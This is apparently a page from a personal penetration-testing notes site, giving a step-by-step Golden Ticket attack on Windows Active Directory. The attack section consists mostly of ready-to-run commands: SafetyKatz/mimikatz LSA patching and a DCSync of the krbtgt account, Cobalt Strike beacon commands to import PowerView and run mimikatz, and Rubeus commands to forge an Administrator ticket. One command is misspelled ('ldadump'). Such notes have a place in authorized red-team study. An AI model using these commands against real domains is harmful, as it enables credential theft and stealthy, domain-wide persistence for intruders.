📓 Jorkle's Notes

      • Breached Credentials Cheatsheet
      • directory-traversal
      • DNS Enumeration Cheatsheet
      • Internal Network Initial Access Cheatsheet
      • Linux Privilege Escalation Cheatsheet
      • People OSINT Cheatsheet
      • PowerView Cheatsheet
      • Search Engine OSINT Cheatsheet
      • SMB Enumeration Cheatsheet
      • ASREP Roasting
      • CONCEPT - What is DSRM?
      • Kerberos Authentication
      • kerberos-delegation
      • SCCM Knowledge for Pentesting Interviews
      • SCCM/MECM Basics
      • What is a Golden Ticket Attack?
              • WiFi (DoS) Deauthentication Attack
        • Foundations
        • IntelTechniques Search Tools
        • Am I Inside of a Docker Container?
        • ASREP Roasting
        • ASREQ-Roasting
        • Coercion to ADCS ESC8 Compromise
        • constrained-delegation
        • DCSYNC with SafetyKatz
        • Diamond Ticket
        • Discover Birthdays
        • Discover SMB Shares remotely
        • Discover Systems Recently Accessed By Compromised Machine
        • Download File With LOLBAS
        • Dump and Crack Kerberos Keys
        • Dump and Crack Kerberos Keys
        • Dump Domain Cached Credentials
        • Dump Google Chrome Passwords
        • Dump LSA Secrets
        • Dump LSASS Logon Passwords
        • Dump NTDS.dit
        • Dump PXE Passwords from Windows (No PXE Password Protection)
        • Dump SAM Database
        • Dump SAM Database from VM Virtual Hard Disk (VHD/VMDK)
        • Dump Windows Credential Manager
        • Enumerate Domain Shares
        • Enumerate OS Name and Version on Linux
        • Enumerate SCCM (MECM) using LDAP
        • Enumerate SMB Version
        • Enumerate Users and Groups via SMB
        • Enumerate Users using Kerberos
        • Enumerate Users With Kerberos PREAUTH Not Enabled
        • Enumerate Windows Firewall Configuration
        • Fetch Powershell History
        • Find Annual Company Reports
        • Find Company Information using CrunchBase
        • Find Interesting Files on Linux
        • Gather Company Email Addresses
        • Golden Ticket
        • Host Discovery
        • How to use PSRemoting with Enter-PSSession
        • Identify Domain Controllers
        • Identify if SCCM (MECM) is Present
        • Internal Port Scanning
        • kerberoasting
        • Kerberos Unconstrained Delegation
        • Load Powershell Scripts and Modules
        • Logon Script Persistence
        • mitm6-poisoning
        • Null/Anon & Guest SMB Auth
        • Obfuscate Powershell Scripts and Modules
        • Organization OSINT via SEC.GOV Edgar Filings
        • Over Pass The Hash
        • Persistence using DSRM Password
        • run-and-run-once-persistence
        • SCCM Computer Account SMB Relay Coercion to MSSQL Server Admi
        • Scheduled Task (Elevated) Persistence
        • Scheduled Task (Non Elevated) Persistence
        • Silver Ticket
        • Skeleton Key
        • SMB Relaying
        • Time Roasting
        • Windows Service Elevated Persistence
    Home

    ❯

    Techniques

    ❯

    Golden Ticket

    Golden Ticket

    Dec 15, 20252 min read

    • windows
    • active-directory
    • persistence
    • mimikatz
    • rubeus

    How to Perform Golden Ticket Attack with SafetyKatz.exe and Rubeus.exe

    1. run SafetyKatz.exe '"lsadump::lsa /patch"'
    2. run SafetyKatz.exe "ldadump::dcsync /user:dcorp\krbtgt" "exit"
    3. run Rubeus.exe golden /aes256:<aes-key> /sid:<sid> /ldap /user:Administrator /printcmd /nowrap

    How to Perform Golden Ticket Attack with Rubeus.exe and Cobalt Strike’s mimikatz and execute-assembly beacon commands.

    Step One - Get the Domain SID with PowerView.ps1 using powershell-import and powerpick beacon commands

    Import PowerView.ps1 using powershell-import beacon command

    beacon> powershell-import /home/jorkle/powerview.ps1

    Get Domain SID using Powerview (from cobalt strike)

    beacon> powerpick Get-DomainSID 
    • Make note of this Domain SID value.

    Example

    Step Two - Obtain krbtgt users aes256 key using mimikatz beacon command

    Command

    beacon> mimikatz !lsadump::lsa /patch
    beacon> mimikatz !lsadump::dcsync /user:north\krbtgt
    • Make note of the krbtgt users aes256 key

    Example

    Step Three - Create Golden Ticket using Rubeus.exe through the execute-assembly beacon command

    Command

    beacon> execute-assembly /home/jorkle/Rubeus.exe golden /aes256:<krbtgt-aes256-key> /sid:<domain-sid> /ldap /user:Administrator /printcmd /nowrap

    Example

    Related

    Related Notes

    All Related Notes

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "windows") OR contains(tags, "active-directory") OR contains(tags, "persistence")
    SORT file.ctime DESC

    windows

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "windows")
    SORT file.ctime DESC

    active-directory

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "active-directory")
    SORT file.ctime DESC

    persistence

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "persistence")
    SORT file.ctime DESC

    Graph View

    Backlinks

    • Techniques
    • Blog
    • Contact
    • Gitrub
    • Linkedin